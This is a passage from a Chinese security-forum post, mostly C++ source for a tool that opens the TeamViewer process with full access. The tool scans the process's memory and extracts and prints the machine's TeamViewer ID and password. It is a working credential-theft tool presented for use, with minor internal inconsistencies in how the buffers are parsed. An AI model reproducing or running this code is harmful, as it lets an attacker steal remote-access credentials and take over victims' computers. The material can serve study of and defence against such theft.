kIa2trICKMx2MAiL8nkwmMMajrOk4blw4HIuq8gDTwIZEfk85fOjIYeMl65ntyynDOAeJkNLP2f3mau6wP5mOtjWWUH5ZZTrWXupUgbuomiVxAC8rZEVDXdZyizeVlmWTElfPg+5y/1i2Xn+9NJpPYzhgwcn7Hjx/vLBfgPPlZ+ZvvSweItRaVSWctyPqTv6VTxhjTAvwMSJU6kMsppL71bApjDMbjMeq6jgB5NBrBWhsdEVzHLL8st6wnGfnmfJmPrGfd7+W4yX2DwTy3Jx63pI7keCXbkxwzWC6pu9y7S6aV7VROiee64jrU5QeAra0tvxQm6MI5h1oOIrIhSAFkgw1fkFBU0okzls/QfHSqgsgzdIYWoZIRfV8lZ7yDbZUjcB+IuC/QiWtfDAoo892i2fGYbJp+2z8Pck4VWkYuNthO1bIxDTkbF5VfO4Gk4yPnINL3pRHM92fp29LI9AnLDpYhflqWVGbqLZsp8C85brSM+jtJMF7og9Mdl/SWJ0eDfTCABwaYk2mTrJMG0jWzGxsbEXhIYNyCpz5Zyg7tqIvG5a8LcFhKy99zeua8x+NxB2zpNdIS8GjeegZA7lndbuLskvBXAjX5m/PgfOQeBgyyNfiVeTnn4hroXHmkfnTflHrKtZfcb1mmUl3k/kp+uXtahzKPOFsCaf1JsCsBdVVVCdjM1ZPMR89wGdKDltUIefQ4Jx1EuTHSGAMYdKbBS6dRKS3L26glDnIWEesv51hj/qwvmaaWCN7BeLDNDxgf/bacKXsODA9erKWO3lLqGayTxjHAZ+iFdl8zIM/QGbq3UW4AH3r23kKrAB19qQeHaX6uIMOysp3qoMqp5jSPpAtvMMfggMFAErkjkN0JV52t0ujVyxm2hPQdPQfpejpZ9daX7yLyrWrt+aLEllY7IWa+8YvlLxmJJZ044+/VMB3jNX1WAjDfFo3gS45nXfjZBnHKeSAZZcqBGJ1frvz+OQPAiO8tiDOmnfkRQQ2aDp+cTlhGQEXOnALkmT5Iug/OQEN9UDsapF70RlQa6HR4GQOiLoCV9+dpb7pPSeCYc/7IPHL3ichvJWAtLLrP+fS+bbVAlctvAHQdSwjr0GPeNp2eL+UCkERytZ1hrYURzoOGnyO/eaWxFlMG6Ag9xRg0jJ+cAxmTREtZFhmZ1uBY1rcG81qHMQKsACDfaxpusywlxG8b9Mv3TGiaJuiQYC0SIC2dBsb4qfUWBk45NCQA5sg/y6UBqY4+M0lgLetNgn/tvNJODW2/SMcHy5LjH/nZKomce7mmIAKqqnXQOEfg8Ynbi3fsTJMZHLr+jelO1ddtWq7rN8agBgNxIOtNitWZ8SDEwsY1QVFDUQAoZWrKNcgzdIYklV7mq+A3j+FZejbKdgqDjzN0etDMYGgbx8uSkbddeW1XHicSWDqzKEgn8TcHFJCMK7NmQTOA+HlokfGyj4++VhqTt7MOS9GnU4l0JEhf79ObfLaP77zyMH8NMmahPjuwxKEU6dP3XZM3fNmIZmOZDWU2hGfqgwvQLH1QAiC5jlcCGcADhs3NzRhlA9KN2aqqAl
贴一下修改后的代码</p>
<pre blockindex=48><code class="hljs language-c++"><span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;stdio.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span><span class=hljs-meta-string>&lt;Windows.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;dbghelp.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>pragma</span> comment(lib,<span class=hljs-meta-string>"dbghelp.lib"</span>)</span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;shlwapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>"tlhelp32.h"</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;psapi.h&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>include</span> <span class=hljs-meta-string>&lt;regex&gt;</span></span>
<span class=hljs-meta>#<span class=hljs-meta-keyword>if</span> _WIN64</span>
_int64 EndAddress = <span class=hljs-number>0x0007FFFFFFFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>else</span></span>
<span class=hljs-keyword>int</span> EndAddress = <span class=hljs-number>0X7FFF0000</span>;
<span class=hljs-meta>#<span class=hljs-meta-keyword>endif</span> <span class=hljs-comment>//根据位数不同遍历的地址大小不同</span></span>
<span class=hljs-keyword>using</span> <span class=hljs-keyword>namespace</span> std;
<span class=hljs-keyword>typedef</span> <span class=hljs-class><span class=hljs-keyword>enum</span> _<span class=hljs-title>MEMORY_INFORMATION_CLASS</span> {</span>
MemoryBasicInformation,
MemoryWorkingSetList,
MemorySectionName,
MemoryBasicVlmInformation
} MEMORY_INFORMATION_CLASS;
<span class=hljs-function><span class=hljs-keyword>typedef</span> <span class=hljs-title>NTSTATUS</span><span class=hljs-params>(WINAPI* fnZwQueryVirtualMemory)</span> <span class=hljs-params>(
HANDLE ProcessHandle,
PVOID BaseAddress,
MEMORY_INFORMATION_CLASS MemoryInformationClass,
PVOID MemoryInformation,
SIZE_T MemoryInformationLength,
PSIZE_T ReturnLength
)</span></span>;
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>GetPidByName</span><span class=hljs-params>(PCWCHAR procName)</span> </span>{
HANDLE ProcessId = <span class=hljs-built_in>CreateToolhelp32Snapshot</span>(TH32CS_SNAPPROCESS, <span class=hljs-literal>NULL</span>);
<span class=hljs-keyword>if</span> (ProcessId == <span class=hljs-literal>NULL</span>) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"Fail"</span>);
}
PROCESSENTRY32 te32 = { <span class=hljs-number>0</span> };
te32.dwSize = <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(te32);
<span class=hljs-keyword>int</span> number = <span class=hljs-number>0</span>;
<span class=hljs-keyword>if</span> (<span class=hljs-built_in>Process32First</span>(ProcessId, &amp;te32)) {
<span class=hljs-keyword>do</span> {
<span class=hljs-keyword>if</span> (!<span class=hljs-built_in>lstrcmp</span>(te32.szExeFile, procName)) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]TeamViewer PID: %d\n"</span>, te32.th32ProcessID);
<span class=hljs-keyword>return</span> te32.th32ProcessID;
}
} <span class=hljs-keyword>while</span> (<span class=hljs-built_in>Process32Next</span>(ProcessId, &amp;te32));
}
} <span class=hljs-comment>//用进程名得到PID</span>
<span class=hljs-function><span class=hljs-keyword>int</span> <span class=hljs-title>main</span><span class=hljs-params>()</span> </span>{
MEMORY_BASIC_INFORMATION mbi = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//初始化MEMORY_BASIC_INFORMATION结构</span>
fnZwQueryVirtualMemory ZwQueryVirtualMemory = (fnZwQueryVirtualMemory)<span class=hljs-built_in>GetProcAddress</span>(<span class=hljs-built_in>GetModuleHandleA</span>(<span class=hljs-string>"ntdll.dll"</span>), <span class=hljs-string>"ZwQueryVirtualMemory"</span>);
<span class=hljs-comment>//ndtll.dll得到ZwQueryVirtualMemory</span>
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>) {
<span class=hljs-keyword>if</span> (ZwQueryVirtualMemory == <span class=hljs-literal>NULL</span>)
{
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"没有找到ZwQueryVirtualMemory函数"</span>);
<span class=hljs-built_in>system</span>(<span class=hljs-string>"pause"</span>);
<span class=hljs-keyword>return</span> <span class=hljs-number>0</span>;
}
}
<span class=hljs-comment>//如果为NULL就是没找到</span>
HANDLE hProcess = <span class=hljs-built_in>OpenProcess</span>(PROCESS_ALL_ACCESS, <span class=hljs-number>0</span>, <span class=hljs-built_in>GetPidByName</span>(<span class=hljs-string>L"TeamViewer.exe"</span>));
_int64 StartAddress = <span class=hljs-number>0x000000007FFE0000</span>;
<span class=hljs-keyword>do</span> {
<span class=hljs-built_in>ZwQueryVirtualMemory</span>(hProcess, (LPVOID)StartAddress, MemoryBasicInformation, &amp;mbi, <span class=hljs-built_in><span class=hljs-keyword>sizeof</span></span>(mbi), <span class=hljs-literal>NULL</span>); <span class=hljs-comment>//从基地址开始遍历将内存信息存放MEMORY_BASIC_INFORMATION结构</span>
<span class=hljs-keyword>if</span> (mbi.RegionSize == <span class=hljs-number>0x1FF000</span>) { <span class=hljs-comment>//查看内存大小是否为1FF000</span>
<span class=hljs-keyword>int</span> id_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//临时变量找到了就改为1避免重复读取</span>
<span class=hljs-keyword>char</span> password_temp = <span class=hljs-number>0</span>; <span class=hljs-comment>//同上</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> i = <span class=hljs-number>0</span>; i &lt; <span class=hljs-number>0x1FF000</span>; i++) {
<span class=hljs-keyword>char</span> id[<span class=hljs-number>0x17</span>]; <span class=hljs-comment>//存放id的char数组因为是unicode字符所以要双倍大小加上前面的0x80和后面的0x000x00</span>
<span class=hljs-keyword>char</span> id_char[<span class=hljs-number>0xA</span>] = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//unicode转换为ASCII存放的数组</span>
<span class=hljs-keyword>char</span> password[<span class=hljs-number>0x15</span>]; <span class=hljs-comment>//存放密码的unicode数组加上前面的0x88和后面的0x000x00</span>
<span class=hljs-keyword>char</span> password_char[<span class=hljs-number>0x9</span>] = { <span class=hljs-number>0</span> }; <span class=hljs-comment>//同上</span>
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), password, <span class=hljs-number>0x15</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-built_in>ReadProcessMemory</span>(hProcess, (LPVOID)((_int64)mbi.BaseAddress + i), id, <span class=hljs-number>0x17</span>, <span class=hljs-literal>NULL</span>);
<span class=hljs-comment>//内存中读出数据</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x8</span>; x++) {
password_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//将0x00去除写入password_char数组</span>
password_char[<span class=hljs-number>8</span>] = <span class=hljs-string>'\x00'</span>; <span class=hljs-comment>//最后加上\x00结尾</span>
<span class=hljs-keyword>if</span> (password[<span class=hljs-number>1</span>] == <span class=hljs-number>0xffffff90</span> &amp;&amp; password[<span class=hljs-number>17</span>] == <span class=hljs-number>0</span> &amp;&amp; password[<span class=hljs-number>18</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(password_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9a-z]{8}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]password: %s\n"</span>, password_char);
password_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//判断password[1]是否为0x8817,18位是否为00最后正则匹配password_char</span>
<span class=hljs-keyword>for</span> (<span class=hljs-keyword>int</span> x = <span class=hljs-number>0</span>; x &lt;= <span class=hljs-number>0x9</span>; x++) {
id_char[x] = password[x * <span class=hljs-number>2</span> + <span class=hljs-number>2</span>];
}
<span class=hljs-comment>//同上</span>
id_char[<span class=hljs-number>9</span>] = <span class=hljs-string>'\x00'</span>;
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>0</span>] == <span class=hljs-number>0x20</span> &amp;&amp; id[<span class=hljs-number>19</span>] == <span class=hljs-number>0</span> &amp;&amp; id[<span class=hljs-number>20</span>] == <span class=hljs-number>0</span> &amp;&amp; <span class=hljs-built_in>regex_match</span>(id_char, <span class=hljs-built_in>regex</span>(<span class=hljs-string>"[0-9]{9}"</span>))) {
<span class=hljs-built_in>printf</span>(<span class=hljs-string>"[+]id: %s\n"</span>, id_char);
id_temp = <span class=hljs-number>1</span>;
}
<span class=hljs-comment>//这里和上面差不多id_temp == 0 是因为ID会出现多个相同的值所以只要取到一次就不用再取了</span>
<span class=hljs-keyword>if</span> (id_temp == <span class=hljs-number>1</span> &amp;&amp; password_temp == <span class=hljs-number>1</span>) {
<span class=hljs-keyword>break</span>;
}
<span class=hljs-comment>//如果id_temp和password_temp都为1说明已经都取到了就可以跳出循环了</span>
}
<span class=hljs-keyword>break</span>;
}
StartAddress += mbi.RegionSize; <span class=hljs-comment>//不是就加上当前内存块大小继续遍历</span>
} <span class=hljs-keyword>while</span> (<span class=hljs-number>0</span> &lt;= StartAddress);
}
</code></pre>
<p blockindex=49><img src="data:image/png;base64,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
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2021-12-27 14:56:30
</li>
<li>阅读 ( 6524 )</li>
<li>分类:<a href=https://forum.butian.net/community/develop target=_blank rel="noopenner noreferrer">安全开发</a>
</li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=1029 data-support_num=5> 5 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=1029> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mt-20 mb-20">
<div class=col-md-12>
请先 <a class=a_unLogin href=https://forum.butian.net/login>登录</a> 后评论
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-1029 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div>
Reference in New Issue Copy Permalink